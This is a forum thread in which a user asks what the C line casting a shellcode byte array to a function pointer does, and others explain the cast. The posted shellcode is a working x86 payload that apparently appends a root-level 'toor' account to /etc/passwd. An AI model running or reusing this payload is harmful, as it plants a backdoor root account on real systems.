Questions about programming languages and debugging
by shan75 » 25 Oct 2010, 12:26
#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x52\x68\x73\x73\x77"
    "\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x41"
    "\x04\x66\xba\x80\x01\x6a\x05\x58\xcd\x80\x89\xc3\x31\xc0\x50\x66"
    "\x68\x68\x0a\x68\x69\x6e\x2f\x73\x68\x2f\x3a\x2f\x62\x68\x3a\x30"
    "\x3a\x3a\x68\x48\x55\x3a\x30\x68\x72\x32\x69\x7a\x68\x44\x7a\x33"
    "\x71\x68\x3a\x47\x66\x2e\x68\x74\x6f\x6f\x72\x89\xe1\x6a\x22\x5a"
    "\xb0\x04\xcd\x80\x6a\x06\x58\xcd\x80";

int main()
{
    /* strlen() returns size_t, so print it with %zu */
    printf("[*] Shellcode - length: %zu\n", strlen(shellcode));
    (*(void(*)())shellcode)();
    return 0;
}
This is a shellcode, but I can't understand this line:
(*(void(*)())shellcode)();
What does it actually mean? Is it a function pointer or what? Please explain it to me.
Thanks
by Gogeta70 » 25 Oct 2010, 17:39
Well, it's definitely a call to execute the shellcode. What confuses me the most is the pointer/dereference operator, so I can't really tell you for sure what that line does.
¯\_(ツ)_/¯ It works on my machine...
by shan75 » 26 Oct 2010, 11:41
Can anyone else help me?
by Lundis » 26 Oct 2010, 13:05
It casts the pointer to a function returning and taking no arguments and calls it. It's a bit clearer if you write it on multiple lines:
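/* shellcode[] is the array from the first post; needs <stdio.h> and <string.h> */
int main()
{
    /* strlen() returns size_t, so print it with %zu */
    printf("[*] Shellcode - length: %zu\n", strlen(shellcode));
    // cast the string to a function pointer
    void (*func)() = (void(*)())shellcode;
    // dereference the function pointer and call the function
    (*func)();
    return 0;
}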
Dereferencing it is optional (on gcc at least) and doesn't really make any sense to me.
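An added example, not written by anyone in the thread, that takes the cast apart using a harmless function in place of the byte array; `target`, `void_fn`, `call_all_forms` and `deref_is_noop` are made-up names. In C a dereferenced function pointer converts straight back to a pointer, so `(*f)()`, `f()` and `(***f)()` make the same call.

```c
#include <stdint.h>
#include <stdio.h>

typedef void (*void_fn)(void);   /* the type spelled void(*)() in the thread */

static int calls;                /* how many times target() has run */
static void target(void) { calls++; }

/* Make the same call through each spelling; returns the number of calls made. */
int call_all_forms(void)
{
    /* Hold the address as a non-function value, like the char array in the post. */
    uintptr_t addr = (uintptr_t)target;

    calls = 0;
    (*(void (*)())addr)();        /* the one-liner from the first post */

    void_fn f = (void_fn)addr;    /* step 1: the cast, given a name */
    (*f)();                       /* step 2: dereference, then call */
    f();                          /* same call without the dereference */
    (***f)();                     /* extra stars change nothing */
    return calls;
}

/* 1 if dereferencing yields the same pointer back, 0 otherwise. */
int deref_is_noop(void)
{
    void_fn f = target;
    return f == *f && f == ***f;
}

int main(void)
{
    printf("calls made: %d\n", call_all_forms());
    printf("deref is a no-op: %d\n", deref_is_noop());
    return 0;
}
```

The thread's version casts a data array rather than a real function, so on systems that map data pages as non-executable the call faults instead of running the bytes.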